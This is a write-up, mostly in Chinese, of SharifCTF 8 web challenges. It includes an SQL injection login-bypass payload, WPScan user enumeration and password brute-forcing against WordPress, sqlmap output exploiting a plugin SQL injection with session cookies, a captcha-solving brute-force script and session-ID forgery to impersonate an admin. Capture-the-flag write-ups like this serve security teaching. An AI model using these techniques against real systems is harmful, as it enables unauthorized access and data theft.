[SharifCTF 8]Web

Hello Rules!!

Find the flag in the rule page

• 直接在rules页面最下面找到了flag

  
  
• SharifCTF{MD5(lowercase(Hello_Rules))}
• SharifCTF{eb7971ce6a17d6c15485bbcb6450b6e2}

---

Hidden input

Login if you can :)
Alternative Link

• 将name=debug的type改为text

• sql注入构造如下：

  
  
• 报错：

username: admin'
password: 123
SQL query: SELECT * FROM users WHERE username=('admin'') AND password=('123')
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '123')' at line 1

Login failed.

• sql语句出来了SELECT * FROM users WHERE username=('admin'') AND password=('123')

  
  

username: admin') or 1=1 -- - 
password: 123
SQL query: SELECT * FROM users WHERE username=('admin') or 1=1 -- - ') AND password=('123')

Logged in!

Your flag is: SharifCTF{c58a108967c46222bbdc743e15932c26}

• SharifCTF{c58a108967c46222bbdc743e15932c26}

---

The news hacker

Only admin can see the flag :)
ctf.sharif.edu:8082

Alternative Link
Hint: Weak password!

• 扫描后台发现是wordpress

  
  
• 利用WPScan：
  wpscan -u http://8082.ctf.certcc.ir/ -e u

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+-----------+-----------+
    | Id | Login     | Name      |
    +----+-----------+-----------+
    | 1  | admin     | admin     |
    | 2  | organizer | organizer |
    +----+-----------+-----------+
[!] Default first WordPress username 'admin' is still used

• 爆破 wp-admin的账号密码：
  wpscan -u http://8082.ctf.certcc.ir/ --wordlist /root/Desktop/passwords_100.txt

+----+-----------+-----------+----------+
| Id | Login     | Name      | Password |
+----+-----------+-----------+----------+
| 1  | admin     | admin     |          |
| 2  | organizer | organizer | password |
+----+-----------+-----------+----------+

• 用organizer-password登陆http://8082.ctf.certcc.ir/wp-admin:
  
  登入进来没什么可以利用的。
• wpscan扫到有sql注入：wpscan -u http://8082.ctf.certcc.ir/

[!] Title: Event List <= 0.7.8 - Authenticated SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8846
    Reference: https://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    Reference: https://plugins.trac.wordpress.org/changeset/1676971/event-list
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9429
[i] Fixed in: 0.7.9

• 利用sqlmap进行sql注入，由于要登入验证（直接sqlmap会重定向302），所以用设置cookie参数：

(py2) C:\Users\JasonC17\sqlmap-master>python sqlmap.py -u "http://8082.ctf.certcc.ir/wp-admin/admin.php?page=el_admin_main&action=edit&id=1" -p id --cookie="wordpress_eb2a34d2fb7f6ae7debb807cd7821561=organizer%7C1518184954%7CF2ePvBQYbxKxrIfX5Z6r7OmKrnEFN2cHpU5tNY1GSi0%7Cf2f1c9e38708813b4245134bcf1c97c991103fcb5537046132560e136ab2e44d; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_eb2a34d2fb7f6ae7debb807cd7821561=organizer%7C1518184954%7CF2ePvBQYbxKxrIfX5Z6r7OmKrnEFN2cHpU5tNY1GSi0%7Cb6c3b4e40024c05877daebebd37e94df38e240a92d856539e1f81e79d3d0e685; wp-settings-2=svgonload%3DnewImagesrc%26editor%3Dtinymce%26mfold%3Do%26uploader%3D1; wp-settings-time-2=1518063824" --sql-shell
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.3.14#dev}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:54:27

[12:54:27] [INFO] resuming back-end DBMS 'mysql'
[12:54:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: page=el_admin_main&action=edit&id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: page=el_admin_main&action=edit&id=-7860 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b707871,0x6754615542794e724d4f737058645a6e7a736a7764467a766e53705245494563555269464e4d7364,0x71766a7171),NULL,NULL-- PFpR
---
[12:54:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[12:54:28] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select table_name from information_schema.tables
[12:54:58] [INFO] fetching SQL SELECT statement query output: 'select table_name from information_schema.tables'
[12:54:59] [WARNING] reflective value(s) found and filtering out
[12:54:59] [INFO] the SQL query used returns 97 entries
[12:55:00] [INFO] retrieved: CHARACTER_SETS
[12:55:01] [INFO] retrieved: COLLATIONS
[12:55:01] [INFO] retrieved: COLLATION_CHARACTER_SET_APPLICABILITY
[12:55:02] [INFO] retrieved: COLUMNS
[12:55:05] [INFO] retrieved: COLUMN_PRIVILEGES
[12:55:06] [INFO] retrieved: ENGINES
[12:55:07] [INFO] retrieved: EVENTS
[12:55:08] [INFO] retrieved: FILES
[12:55:09] [INFO] retrieved: GLOBAL_STATUS
[12:55:09] [INFO] retrieved: GLOBAL_VARIABLES
[12:55:10] [INFO] retrieved: KEY_COLUMN_USAGE
[12:55:11] [INFO] retrieved: OPTIMIZER_TRACE
[12:55:12] [INFO] retrieved: PARAMETERS
[12:55:13] [INFO] retrieved: PARTITIONS
[12:55:14] [INFO] retrieved: PLUGINS
[12:55:15] [INFO] retrieved: PROCESSLIST
[12:55:16] [INFO] retrieved: PROFILING
[12:55:17] [INFO] retrieved: REFERENTIAL_CONSTRAINTS
[12:55:18] [INFO] retrieved: ROUTINES
[12:55:19] [INFO] retrieved: SCHEMATA
[12:55:20] [INFO] retrieved: SCHEMA_PRIVILEGES
[12:55:21] [INFO] retrieved: SESSION_STATUS
[12:55:22] [INFO] retrieved: SESSION_VARIABLES
[12:55:22] [INFO] retrieved: STATISTICS
[12:55:23] [INFO] retrieved: TABLES
[12:55:24] [INFO] retrieved: TABLESPACES
[12:55:25] [INFO] retrieved: TABLE_CONSTRAINTS
[12:55:26] [INFO] retrieved: TABLE_PRIVILEGES
[12:55:27] [INFO] retrieved: TRIGGERS
[12:55:28] [INFO] retrieved: USER_PRIVILEGES
[12:55:29] [INFO] retrieved: VIEWS
[12:55:30] [INFO] retrieved: INNODB_LOCKS
[12:55:31] [INFO] retrieved: INNODB_TRX
[12:55:31] [INFO] retrieved: INNODB_SYS_DATAFILES
[12:55:32] [INFO] retrieved: INNODB_FT_CONFIG
[12:55:33] [INFO] retrieved: INNODB_SYS_VIRTUAL
[12:55:34] [INFO] retrieved: INNODB_CMP
[12:55:35] [INFO] retrieved: INNODB_FT_BEING_DELETED
[12:55:39] [INFO] retrieved: INNODB_CMP_RESET
[12:55:40] [INFO] retrieved: INNODB_CMP_PER_INDEX
[12:55:41] [INFO] retrieved: INNODB_CMPMEM_RESET
[12:55:42] [INFO] retrieved: INNODB_FT_DELETED
[12:55:43] [INFO] retrieved: INNODB_BUFFER_PAGE_LRU
[12:55:44] [INFO] retrieved: INNODB_LOCK_WAITS
[12:55:45] [INFO] retrieved: INNODB_TEMP_TABLE_INFO
[12:55:45] [INFO] retrieved: INNODB_SYS_INDEXES
[12:55:46] [INFO] retrieved: INNODB_SYS_TABLES
[12:55:47] [INFO] retrieved: INNODB_SYS_FIELDS
[12:55:48] [INFO] retrieved: INNODB_CMP_PER_INDEX_RESET
[12:55:49] [INFO] retrieved: INNODB_BUFFER_PAGE
[12:55:50] [INFO] retrieved: INNODB_FT_DEFAULT_STOPWORD
[12:55:51] [INFO] retrieved: INNODB_FT_INDEX_TABLE
[12:55:52] [INFO] retrieved: INNODB_FT_INDEX_CACHE
[12:55:53] [INFO] retrieved: INNODB_SYS_TABLESPACES
[12:55:54] [INFO] retrieved: INNODB_METRICS
[12:55:55] [INFO] retrieved: INNODB_SYS_FOREIGN_COLS
[12:55:56] [INFO] retrieved: INNODB_CMPMEM
[12:55:57] [INFO] retrieved: INNODB_BUFFER_POOL_STATS
[12:55:58] [INFO] retrieved: INNODB_SYS_COLUMNS
[12:55:59] [INFO] retrieved: INNODB_SYS_FOREIGN
[12:56:00] [INFO] retrieved: INNODB_SYS_TABLESTATS
[12:56:01] [INFO] retrieved: wp_app_user_info
[12:56:02] [INFO] retrieved: wp_bwg_album
[12:56:03] [INFO] retrieved: wp_bwg_album_gallery
[12:56:04] [INFO] retrieved: wp_bwg_gallery
[12:56:05] [INFO] retrieved: wp_bwg_image
[12:56:06] [INFO] retrieved: wp_bwg_image_comment
[12:56:07] [INFO] retrieved: wp_bwg_image_rate
[12:56:08] [INFO] retrieved: wp_bwg_image_tag
[12:56:09] [INFO] retrieved: wp_bwg_shortcode
[12:56:10] [INFO] retrieved: wp_bwg_theme
[12:56:11] [INFO] retrieved: wp_commentmeta
[12:56:12] [INFO] retrieved: wp_comments
[12:56:13] [INFO] retrieved: wp_event_list
[12:56:14] [INFO] retrieved: wp_links
[12:56:15] [INFO] retrieved: wp_options
[12:56:16] [INFO] retrieved: wp_postmeta
[12:56:17] [INFO] retrieved: wp_posts
[12:56:18] [INFO] retrieved: wp_spidercalendar_calendar
[12:56:19] [INFO] retrieved: wp_spidercalendar_event
[12:56:19] [INFO] retrieved: wp_spidercalendar_event_category
[12:56:20] [INFO] retrieved: wp_spidercalendar_theme
[12:56:21] [INFO] retrieved: wp_spidercalendar_widget_theme
[12:56:22] [INFO] retrieved: wp_statistics_exclusions
[12:56:23] [INFO] retrieved: wp_statistics_historical
[12:56:24] [INFO] retrieved: wp_statistics_pages
[12:56:25] [INFO] retrieved: wp_statistics_search
[12:56:25] [INFO] retrieved: wp_statistics_useronline
[12:56:26] [INFO] retrieved: wp_statistics_visit
[12:56:27] [INFO] retrieved: wp_statistics_visitor
[12:56:28] [INFO] retrieved: wp_term_relationships
[12:56:29] [INFO] retrieved: wp_term_taxonomy
[12:56:30] [INFO] retrieved: wp_termmeta
[12:56:31] [INFO] retrieved: wp_terms
[12:56:32] [INFO] retrieved: wp_user_profile_follow
[12:56:33] [INFO] retrieved: wp_usermeta
[12:56:34] [INFO] retrieved: wp_users
select table_name from information_schema.tables [97]:
[*] CHARACTER_SETS
[*] COLLATION_CHARACTER_SET_APPLICABILITY
[*] COLLATIONS
[*] COLUMN_PRIVILEGES
[*] COLUMNS
[*] ENGINES
[*] EVENTS
[*] FILES
[*] GLOBAL_STATUS
[*] GLOBAL_VARIABLES
[*] INNODB_BUFFER_PAGE
[*] INNODB_BUFFER_PAGE_LRU
[*] INNODB_BUFFER_POOL_STATS
[*] INNODB_CMP
[*] INNODB_CMP_PER_INDEX
[*] INNODB_CMP_PER_INDEX_RESET
[*] INNODB_CMP_RESET
[*] INNODB_CMPMEM
[*] INNODB_CMPMEM_RESET
[*] INNODB_FT_BEING_DELETED
[*] INNODB_FT_CONFIG
[*] INNODB_FT_DEFAULT_STOPWORD
[*] INNODB_FT_DELETED
[*] INNODB_FT_INDEX_CACHE
[*] INNODB_FT_INDEX_TABLE
[*] INNODB_LOCK_WAITS
[*] INNODB_LOCKS
[*] INNODB_METRICS
[*] INNODB_SYS_COLUMNS
[*] INNODB_SYS_DATAFILES
[*] INNODB_SYS_FIELDS
[*] INNODB_SYS_FOREIGN
[*] INNODB_SYS_FOREIGN_COLS
[*] INNODB_SYS_INDEXES
[*] INNODB_SYS_TABLES
[*] INNODB_SYS_TABLESPACES
[*] INNODB_SYS_TABLESTATS
[*] INNODB_SYS_VIRTUAL
[*] INNODB_TEMP_TABLE_INFO
[*] INNODB_TRX
[*] KEY_COLUMN_USAGE
[*] OPTIMIZER_TRACE
[*] PARAMETERS
[*] PARTITIONS
[*] PLUGINS
[*] PROCESSLIST
[*] PROFILING
[*] REFERENTIAL_CONSTRAINTS
[*] ROUTINES
[*] SCHEMA_PRIVILEGES
[*] SCHEMATA
[*] SESSION_STATUS
[*] SESSION_VARIABLES
[*] STATISTICS
[*] TABLE_CONSTRAINTS
[*] TABLE_PRIVILEGES
[*] TABLES
[*] TABLESPACES
[*] TRIGGERS
[*] USER_PRIVILEGES
[*] VIEWS
[*] wp_app_user_info
[*] wp_bwg_album
[*] wp_bwg_album_gallery
[*] wp_bwg_gallery
[*] wp_bwg_image
[*] wp_bwg_image_comment
[*] wp_bwg_image_rate
[*] wp_bwg_image_tag
[*] wp_bwg_shortcode
[*] wp_bwg_theme
[*] wp_commentmeta
[*] wp_comments
[*] wp_event_list
[*] wp_links
[*] wp_options
[*] wp_postmeta
[*] wp_posts
[*] wp_spidercalendar_calendar
[*] wp_spidercalendar_event
[*] wp_spidercalendar_event_category
[*] wp_spidercalendar_theme
[*] wp_spidercalendar_widget_theme
[*] wp_statistics_exclusions
[*] wp_statistics_historical
[*] wp_statistics_pages
[*] wp_statistics_search
[*] wp_statistics_useronline
[*] wp_statistics_visit
[*] wp_statistics_visitor
[*] wp_term_relationships
[*] wp_term_taxonomy
[*] wp_termmeta
[*] wp_terms
[*] wp_user_profile_follow
[*] wp_usermeta
[*] wp_users


sql-shell> select column_name from information_schema.columns where table_name='wp_posts'
[13:01:53] [INFO] fetching SQL SELECT statement query output: 'select column_name from information_schema.columns where table_name='wp_posts''
[13:01:55] [INFO] the SQL query used returns 23 entries
[13:01:56] [INFO] retrieved: ID
[13:01:58] [INFO] retrieved: post_author
[13:01:59] [INFO] retrieved: post_date
[13:02:00] [INFO] retrieved: post_date_gmt
[13:02:01] [INFO] retrieved: post_content
[13:02:01] [INFO] retrieved: post_title
[13:02:03] [INFO] retrieved: post_excerpt
[13:02:04] [INFO] retrieved: post_status
[13:02:05] [INFO] retrieved: comment_status
[13:02:09] [INFO] retrieved: ping_status
[13:02:10] [INFO] retrieved: post_password
[13:02:11] [INFO] retrieved: post_name
[13:02:12] [INFO] retrieved: to_ping
[13:02:13] [INFO] retrieved: pinged
[13:02:14] [INFO] retrieved: post_modified
[13:02:15] [INFO] retrieved: post_modified_gmt
[13:02:16] [INFO] retrieved: post_content_filtered
[13:02:17] [INFO] retrieved: post_parent
[13:02:18] [INFO] retrieved: guid
[13:02:19] [INFO] retrieved: menu_order
[13:02:20] [INFO] retrieved: post_type
[13:02:21] [INFO] retrieved: post_mime_type
[13:02:22] [INFO] retrieved: comment_count
select column_name from information_schema.columns where table_name='wp_posts' [23]:
[*] comment_count
[*] comment_status
[*] guid
[*] ID
[*] menu_order
[*] ping_status
[*] pinged
[*] post_author
[*] post_content
[*] post_content_filtered
[*] post_date
[*] post_date_gmt
[*] post_excerpt
[*] post_mime_type
[*] post_modified
[*] post_modified_gmt
[*] post_name
[*] post_parent
[*] post_password
[*] post_status
[*] post_title
[*] post_type
[*] to_ping

sql-shell> select post_content from wp_posts
[13:03:01] [INFO] fetching SQL SELECT statement query output: 'select post_content from wp_posts'
[13:03:03] [INFO] the SQL query used returns 13 entries
[13:03:03] [INFO] retrieved:
[13:03:06] [INFO] retrieved: <span class="main-article-info">Security researc...
[13:03:07] [INFO] retrieved:
[13:03:08] [INFO] retrieved: <strong>Researchers at Proofpoint discovered rec...
[13:03:09] [INFO] retrieved: Those <span class="link"><a href="https://www.cn...
[13:03:10] [INFO] retrieved:
[13:03:12] [INFO] retrieved:
[13:03:13] [INFO] retrieved: Flag is SharifCTF{e7134abea7438e937b87608eab0d979c}
[13:03:14] [INFO] retrieved:
[13:03:15] [INFO] retrieved: The Senior Incident Response Consultant will wor...
[13:03:16] [INFO] retrieved:  [shortcode atts_1=”test” atts_2=”test”]
[13:03:17] [INFO] retrieved:
[13:03:20] [INFO] retrieved:
select post_content from wp_posts [6]:
[*]  [shortcode atts_1=”test” atts_2=”test”]
[*] <span class="main-article-info">Security researchers have discovered several severe vulnerabilities and a secret hard-coded backdoor in Western Digital's My Cloud NAS devices that could allow remote attackers to gain unrestricted root access to the device.\r\n\r\nWestern Digital's My Cloud (WDMyCloud) is one of the most popular network-attached storage devices which is being used by individuals and businesses to host their files, and automatically backup and sync them with various cloud and web-based services.\r\n\r\nThe device lets users not only share files in a home network, but the private cloud feature also allows them to access their data from anywhere at any time.<img class="alignnone size-full wp-image-13" src="http://10.0.3.189/wp-content/uploads/2018/01/81XdO46fI7L._SL1500_.jpg" alt="" width="1500" height="1500" /></span>
[*] <strong>Researchers at Proofpoint discovered recently that Google Apps Script could have been abused by malicious hackers to automatically download malware hosted on Google Drive to targeted devices.</strong>\r\n\r\nGoogle Apps Script is a JavaScript-based scripting language that allows developers to build web applications and automate tasks. Experts noticed that the service could have been leveraged to deliver malware by using simple triggers, such as onOpen or onEdit.\r\n\r\nIn an <a href="https://www.proofpoint.com/us/corporate-blog/post/new-google-apps-script-vulnerability-extends-url-based-threats-saas-platforms" target="_blank" rel="noopener">attack scenario described by Proofpoint</a>, attackers uploaded a piece of malware to Google Drive and created a public link to it. They then used Google Docs to send the link to the targeted users. Once victims attempted to edit the Google Docs file, the Apps Script triggers would cause the malware to be automatically downloaded to their devices. Researchers said attackers could have used social engineering to convince the target to execute the malware.\r\n\r\nGoogle has implemented new restrictions for simple triggers in an effort to block malware and phishing attacks triggered by opening a document.\r\n\r\nWhile there is no evidence that this method has been exploited in the wild, malicious actors abusing Google Apps Script is not unheard of. A cybercrime group using the infamous Carbanak malware at one point <a href="http://www.securityweek.com/carbanak-hackers-use-google-command-and-control" target="_blank" rel="noopener">leveraged the service</a> for command and control (C&amp;C) communications.\r\n\r\n“SaaS platforms remain a ‘Wild West’ for threat actors and defenders alike. New tools like Google Apps Script are rapidly adding functionality while threat actors look for novel ways of abusing these platforms. At the same time, few tools exist that can detect threats generated by or distributed via legitimate software-as-a-service (SaaS) platforms, ” explained Maor Bin, security research lead of Threat Systems Products at Proofpoint.\r\n\r\n“This creates considerable opportunities for threat actors who can leverage newfound vulnerabilities or use ‘good for bad’: making use of legitimate features for malicious purposes,” he added.\r\n\r\nA few months ago, Google announced the introduction of <a href="http://www.securityweek.com/google-warns-users-potentially-risky-web-apps" target="_blank" rel="noopener">new warnings</a> for potentially risky web apps and Apps Scripts.
[*] Flag is SharifCTF{e7134abea7438e937b87608eab0d979c}
[*] The Senior Incident Response Consultant will work within established methodologies to perform a variety of Incident Response related activities for Cisco customers, to include responding to cyber incidents, proactively hunting for adversaries in customer networks, designing and performing Table Top Exercises, and performing IR Readiness Assessments.
[13:03:20] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[*] Those <span class="link"><a href="https://www.cnet.com/news/spectre-meltdown-intel-arm-amd-processor-cpu-chip-flaw-vulnerability-faq/">major chip security flaws</a></span>, <span class="link"><a href="https://www.cnet.com/news/chips-exploit-meltdown-spectre-security-flaws-afflict-arm-phones-and-intel-pcs/">detailed Wednesday</a></span>, impact all Macs and <a href="https://www.cnet.com/tags/ios-11/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{&quot;action":"inline-annotation|Apple iOS 11|CNET_TAG|483"}">iOS</a> devices. But <a href="https://www.cnet.com/apple/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Apple|CNET_COLL|579"}">Apple</a> said downloading its latest software updates fixes one of the vulnerabilities.\r\n\r\nApple on Thursday said all of its computers, <a href="https://www.cnet.com/products/apple-iphone-x/review/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Apple iPhone X|CNET_FAM_SERIES|558"}">iPhones</a> and <a href="https://www.cnet.com/products/apple-ipad-2017-9-7-inch/review/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Apple iPad 2017 (9.7-inch)|CNET_FAM_SERIES|285"}">iPads</a> are affected by the two newly discovered flaws, dubbed <a href="https://meltdownattack.com/meltdown.pdf" target="_blank" rel="noopener" data-component="externalLink">Meltdown</a> and <a href="https://spectreattack.com/spectre.pdf" target="_blank" rel="noopener" data-component="externalLink">Spectre</a>. It said at that time that the <a href="https://www.cnet.com/products/apple-watch-series-3/review/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Apple Watch Series 3|CNET_FAM_SERIES|150"}">Apple Watch</a> isn't impacted by Meltdown, and on Friday added that the smartwatch isn't affected by Spectre, either. Apple TVs, meanwhile, are affected.\r\n\r\nThe company didn't immediately give additional information about which <a href="https://www.cnet.com/products/apple-tv-4k/review/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Apple TV 4K|CNET_FAM_SERIES|225"}">Apple TV</a> models are impacted.\r\n\r\nApple said, though, that "there are no known exploits impacting customers at this time" and that for a hacker to exploit the flaws, there would also have to be a malicious app loaded on a Mac or iOS device. Apple recommended only downloading software from trusted locations like its App Store to avoid software with malware.\r\n<div class="shortcode related-links float_left">\r\n<h3>For more on the chip flaws</h3>\r\n<ul>\r\n \t<li><a href="https://www.cnet.com/news/chips-exploit-meltdown-spectre-security-flaws-afflict-arm-phones-and-intel-pcs/">Major Intel, Arm chip security flaw puts your PCs, phones at risk</a></li>\r\n \t<li><a href="https://www.cnet.com/news/spectre-meltdown-intel-arm-amd-processor-cpu-chip-flaw-vulnerability-faq/">Spectre and Meltdown: Details you need on those big chip flaws</a></li>\r\n \t<li><a href="https://www.cnet.com/news/most-intel-pcs-immune-to-spectre-meltdown-next-week/">Most Intel PCs 'immune' to Spectre, Meltdown by next week</a></li>\r\n \t<li><a href="https://www.cnet.com/how-to/how-to-fix-meltdown-spectre-intel-amd-arm-windows-mac-android-ios/">How to protect yourself from Meltdown and Spectre CPU flaws</a></li>\r\n</ul>\r\n</div>\r\n<div id="inpage-video-top-5a51dc3534bc5" class="ad-inpage-video-top" data-ad="inpage-video-top"></div>\r\nApple said iOS 11.2, <a href="https://www.cnet.com/tags/macos-high-sierra/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Apple macOS High Sierra|CNET_TAG|285"}">MacOS</a> 10.13.2 and TVOS 11.2 already defend against the Meltdown flaw. It plans to release fixes for its Safari browser over the coming days to help defend against the Spectre flaw.\r\n\r\n"We continue to develop and test further mitigations for these issues and will release them in upcoming updates of iOS, MacOS, tvOS and watchOS," Apple said on a<a href="https://support.apple.com/en-us/HT208394" target="_blank" rel="noopener" data-component="externalLink"> support page</a>.\r\n\r\nOn Tuesday, news broke that a newly discovered exploit in most modern <a href="https://www.cnet.com/tags/processors/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Processors|CNET_TAG|502"}">processors</a> could make your computer or phone vulnerable to attacks. Then on Wednesday, <a href="https://www.cnet.com/tags/intel/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Intel|CNET_TAG|1300"}">Intel</a>, Arm and others <span class="link"><a href="https://www.cnet.com/news/chips-exploit-meltdown-spectre-security-flaws-afflict-arm-phones-and-intel-pcs/">acknowledged their processors are affected by the flaws</a></span>.\r\n\r\nIntel supplies chips for most of the world's computers, including Apple's Macs. And Arm's architecture is built into nearly every mobile processor, including chips designed by Apple for the iPhone and iPad.\r\n\r\nSeveral researchers, including a member of?<a href="https://googleprojectzero.blogspot.co.uk/2018/01/reading-privileged-memory-with-side.html" target="_blank" rel="noopener" data-component="externalLink">Google's Project Zero</a>?team, found that a design technique used in chips from Intel, Arm and others could allow hackers to access private data from the memory on your device that it shouldn't be able to see. The problem impacts processors going back more than two decades and could let hackers access passwords, encryption keys or sensitive information open in applications.\r\n\r\nThe flaws aren't unique to one particular chipmaker or device. Instead, they impact everything from <a href="https://www.cnet.com/topics/phones/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Phones|CNET_CAT_TOPIC|483"}">phones</a> to PCs and servers. The?<span class="link"><a href="https://www.cnet.com/news/how-to-fix-meltdown-spectre-intel-amd-arm-windows-mac-android-ios/">computing industry is scrambling to lessen the severity of the problem</a></span>?with updates to <a href="https://www.cnet.com/topics/operating-systems/" data-annotation="true" data-component="linkTracker" data-link-tracker-options="{"action":"inline-annotation|Operating Systems|CNET_CAT_TOPIC|390"}">operating systems</a>, web browsers, cloud-computing services and other foundations that need to be kept secure.\r\n\r\nIntel on Thursday said that by the end of next week, it expects to have issued <span class="link"><a href="https://www.cnet.com/news/most-intel-pcs-immune-to-spectre-meltdown-next-week/">updates for more than 90 percent of its processors</a></span> introduced within the past five years. The updates make computers "immune from both exploits," Intel said.\r\n\r\nFirst published Jan. 4 at 4:33 a.m. PT.\r\n<strong>Update Jan. 4 at 4:45 p.m. PT: </strong>Added background information.\r\n<strong>Update Jan. 5 at 12:07 p.m. PT:</strong> Added that neither Spectre nor Meltdown affects the Apple Watch.

• [*] Flag is SharifCTF{e7134abea7438e937b87608eab0d979c}

---

Photoshare

Photoshare is an internet based photo sharing service. Login to this website as admin.
web: ctf.sharif.edu:8084
Alternative Link
username: jack
password: Year and month of Jack's birthday.
Hint:No need for XSS or bypassing the uploader.

• 按照提示，用户名是jack，密码是year and month（YYMM），页面有计算验证，应该用一个python脚本来爆破，查看源码需要提交的项目：

<div class = "container">  
<div class="wrapper"> 
<form action="[/signin](view-source:http://8084.ctf.certcc.ir/signin)" method="post" name="Login_Form" class="form-signin">  
<h3 class="form-signin-heading">Welcome Back! Please Sign In</h3>  
<hr class="colorgraph">
<br>  
<input type="text" class="form-control" name="Username" placeholder="Username" required="" autofocus="" />  
<input type="password" class="form-control" name="Password" placeholder="Password" required=""/>  
<input type="text" class="form-control" name="SecQuestion" placeholder="15 - 15 = " required="" autofocus="" />  
<input type="hidden" name="field" value="cfcd208495d565ef66e7dff9f98764da">  
<input type="hidden" name="_token" value="mB05LJVYxsH5EJVgLQOLBmQOJcTeorbPFYhvoWec">  
<button class="btn btn-lg btn-primary btn-block"  name="Submit" value="Login" type="Submit">Login</button>  
</form>  </div>  </div>

import requests
import re
##密码生成器
def passwd():
    for year in range(1900,2019):
        for month in range(1,13):
            yield '%04d%02d' %(year,month)
s=requests.Session()            
loginurl='http://8084.ctf.certcc.ir/login'
posturl='http://8084.ctf.certcc.ir/signin'##查看网络注意post的网址是这个，不是http://8084.ctf.certcc.ir/login
response=s.get(loginurl)
source=response.text #get source code
##匹配post参数
SecQuestion=re.search('name="SecQuestion" placeholder="(.*?)"',source).group(1)
answer=eval(SecQuestion.split('=')[0].replace('x','*'))
field=re.search('name="field" value="(.*?)"',source).group(1)
token=re.search('name="_token" value="(\w+)"',source).group(1)

for passwd in passwd():
    data={
    'Username':'jack',
    'Password': passwd,
    'SecQuestion':answer,
    'field':field,
    '_token':token,
    'Submit':'Login'
}
    result=s.post(url=posturl,data=data)
    print(passwd)
    if 'Welcome Back' not in result.text:
        break
print('password:',passwd)

• password：195408

  
  

---

• Hint:No need for XSS or bypassing the uploader.
• 源代码有一段代码是图片的地址：

<div class="col-md-6">  
<img width="200" height="200" src="[http://8084.ctf.certcc.ir/GetPicture/jack/1](view-source:http://8084.ctf.certcc.ir/GetPicture/jack/1)"/>  <b>dfas</b>  </div>  <div class="col-md-6">  
<img width="200" height="200" src="[http://8084.ctf.certcc.ir/GetPicture/jack/2](view-source:http://8084.ctf.certcc.ir/GetPicture/jack/2)"/>  <b>sdfasdfasdf</b>  </div>  <div class="col-md-6">  
<img width="200" height="200" src="[http://8084.ctf.certcc.ir/GetPicture/jack/3](view-source:http://8084.ctf.certcc.ir/GetPicture/jack/3)"/>  <b>red</b>  </div>  <div class="col-md-6">  
<img width="200" height="200" src="[http://8084.ctf.certcc.ir/GetPicture/jack/4](view-source:http://8084.ctf.certcc.ir/GetPicture/jack/4)"/>  <b>xD</b>  </div>  <div class="col-md-6" style="padding-bottom: 20px;">  
<img width="200" height="200" src="[http://8084.ctf.certcc.ir/GetPicture/jack/5](view-source:http://8084.ctf.certcc.ir/GetPicture/jack/5)"/>  <b>r&#039;#&#039;//</b>  </div>  <div class="col-md-6" style="padding-bottom: 20px;">  
<img width="200" height="200" src="[http://8084.ctf.certcc.ir/GetPicture/jack/6](view-source:http://8084.ctf.certcc.ir/GetPicture/jack/6)"/></pre>

• 尝试修改jack为admin,被拒绝了

Error 403! Permission Denied.

• 发现session_id=md5(jack18)

  
  

• 尝试利用Modify headers修改session_id=md5(admin18),开始改session_id还一直改不过来，应该改cookie，value填session_id=***：

  
  

• 刷新进来，设置了SecQuestion：

  
  

• 查看一下admin的图片看看有没有信息：
  http://8084.ctf.certcc.ir/GetPicture/admin/3
  

  

• 登入进来：

  
  

• SharifCTF{kmvfwmj6sea7get9wggu249ehjc8hmdd}

---

Best SMS

We used "Best SMS" API to send flag to some of our colleagues. :
web
Alternative Link
username: demo
password: demo
Hint: E-mail Field.